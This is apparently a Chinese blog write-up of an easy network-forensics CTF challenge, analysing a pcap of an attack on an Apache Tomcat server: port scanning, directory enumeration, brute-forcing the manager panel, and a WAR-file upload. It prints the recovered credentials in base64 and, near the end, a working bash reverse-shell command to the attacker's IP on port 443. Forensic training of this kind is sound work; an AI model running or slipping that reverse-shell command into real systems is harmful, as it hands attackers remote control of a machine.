网络取证-Tomcat-简单

题干:

我们的 SOC 团队在公司内部网的一台 Web 服务器上检测到可疑活动。为了更深入地了解情况,团队捕获了网络流量进行分析。此 pcap 文件可能包含一系列恶意活动,这些活动已导致 Apache Tomcat Web 服务器遭到破坏。我们需要进一步调查这一事件。

鉴于在 Web 服务器上检测到的可疑活动,pcap数据包显示服务存在跨端口请求,这表明存在潜在的扫描行为。您能否确定在我们的服务器上发起这些请求的源 IP 地址?

使用wireshark工具直接打开下载好的pcap数据包,然后根据端口大小进行排序,我们发现14.0.0.120 对 10.0.0.112 设备从23端口开始进行递归探测

所以此题的答案为14.0.0.120

根据与攻击者关联的已识别 IP 地址,您能否确定攻击者活动起源于哪个城市?

因为这个题目是歪果仁出的,所以不建议使用国内的ip地址查询,使用国外的,否则答案就是错的

Pcap数据包中的端口中的哪一个提供对 Web 服务器管理面板的访问?

很显然,真相只有一个,那就是8080

攻击者在我们的服务器上发现开放端口后,似乎试图枚举我们 Web 服务器上的目录和文件。您可以从分析中识别出攻击者使用的工具是什么吗?

竟然是枚举目录,那我们直接找404

随便选一个,进行http追踪

特征已经很明显了,虽然不知道这个工具是啥,但是确定就是他了

在他们枚举 Web 服务器上的目录之后,攻击者发出了大量请求,试图识别管理界面。攻击者发现了与管理面板关联的哪个特定目录?

这道题其实承上启下,人家问的是与管理面板关联的目录,所以我们不能光看200请求码,还需要看有登录标识的

很显然,是manager

访问管理面板后,攻击者试图暴力破解登录凭据。从数据中,您能否识别出攻击者成功用于授权的正确用户名和密码组合?

直接找到最后一个401的下一个数据包就行

追踪流

YWRtaW46dG9tY2F0

使用葵爷进行base64解码

进入管理面板,攻击者试图上传文件,意图建立反向 shell。您能从捕获的数据中识别出此恶意文件的名称吗?

直接找上传数据包

追踪流

好好好,war包上传getshell是吧

JXQOZY.war

在我们的服务器上成功建立反向 shell 后,攻击者旨在确保受感染机器上的持久性。从分析中,您能否确定它们计划运行的特定命令是什么吗?

这里就不能追踪http请求了,我们需要回到最初始的状态,直接找getshell成功后,第一次访问这个shell的后面的数据包

为啥看这个呢,因为8080war包上传后最后通过shell控制的当然还是80端口

结果显而易见

/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'

so easy

相关推荐
24zhgjx-lxq10 分钟前
华为ensp:MSTP
网络·安全·华为·hcip·ensp
vx_BS8133012 分钟前
【直接可用源码免费送】计算机毕业设计精选项目03574基于Python的网上商城管理系统设计与实现:Java/PHP/Python/C#小程序、单片机、成品+文档源码支持定制
java·python·课程设计
2601_9498683612 分钟前
Flutter for OpenHarmony 电子合同签署App实战 - 已签合同实现
java·开发语言·flutter
ling___xi12 分钟前
《计算机网络》计网3小时期末速成课各版本教程都可用谢稀仁湖科大版都可用_哔哩哔哩_bilibili(笔记)
网络·笔记·计算机网络
REDcker23 分钟前
Linux 文件描述符与 Socket 选项操作详解
linux·运维·网络
达文汐39 分钟前
【困难】力扣算法题解析LeetCode332:重新安排行程
java·数据结构·经验分享·算法·leetcode·力扣
培风图南以星河揽胜40 分钟前
Java版LeetCode热题100之零钱兑换:动态规划经典问题深度解析
java·leetcode·动态规划
Up九五小庞43 分钟前
用arpspoof实现100%批量切断192.168.110.10 - 192.168.110.100 断网(双向欺骗)--九五小庞
网络·开源
躺柒1 小时前
读数字时代的网络风险管理:策略、计划与执行04风险指引体系
大数据·网络·信息安全·数字化·网络管理·网络风险管理
启山智软1 小时前
【中大企业选择源码部署商城系统】
java·spring·商城开发